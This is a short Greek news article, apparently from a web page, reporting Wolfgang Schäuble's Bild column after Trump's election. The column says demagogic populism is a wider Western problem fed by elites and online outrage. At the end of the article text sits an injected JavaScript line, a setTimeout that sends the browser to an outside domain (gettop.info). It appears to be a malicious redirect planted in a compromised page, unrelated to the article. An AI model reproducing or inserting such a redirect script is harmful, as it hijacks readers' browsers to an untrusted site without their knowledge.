Καυστικός Σόιμπλε: Ο δημαγωγικός λαϊκισμός δεν είναι πρόβλημα μόνο της Αμερικής

0
4

 

Με άρθρο του στη γερμανική Bild, ο Γερμανός υπουργός Οικονομικών Βόλφγκανγκ Σόιμπλε, αναφερόμενος στην προεδρική νίκη του Ντόναλντ Τραμπ σχολίασε πως «ο δημαγωγικός λαϊκισμός δεν είναι μόνο πρόβλημα της Αμερικής».

Όπως γράφει ο κ. Σόιμπλε «και αλλού στη Δύση οι πολιτικές αντιπαραθέσεις βρίσκονται σε μιαν ανησυχητική κατάσταση», ενώ εκτιμά ότι «μια από τις αιτίες του διογκούμενου λαϊκισμού είναι το γεγονός ότι οι ελίτ της πολιτικής , της οικονομίας και της κοινωνίας δεν δίνουν πάντα την καλύτερη εικόνα».

Επιπλέον, «οι διαδικασίες λήψης των αποφάσεων δεν είναι πάντοτε κατανοητές. Σε αυτό προστίθεται και η επίδραση της διαμόρφωση γνώμης από το διαδίκτυο, όπου είναι απολύτως αδιάφορο εάν οι ισχυρισμοί είναι βάσιμοι, σημαντικό είναι να προκαλείται ο σωστός βαθμός οργής» γράφει επικριτικά ο Σόιμπλε.

Όπως τονίζει χαρακτηριστικά, είναι αναγκαία η πολιτισμένη συζήτηση: «Καθένας πρέπει να είναι διατεθειμένος να θέλει να μάθει. Εάν είμαστε ανοικτοί στην άποψη του άλλου και την αλλαγή γνώμης τότε ο λαϊκισμός θα τα βρει σκούρα». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here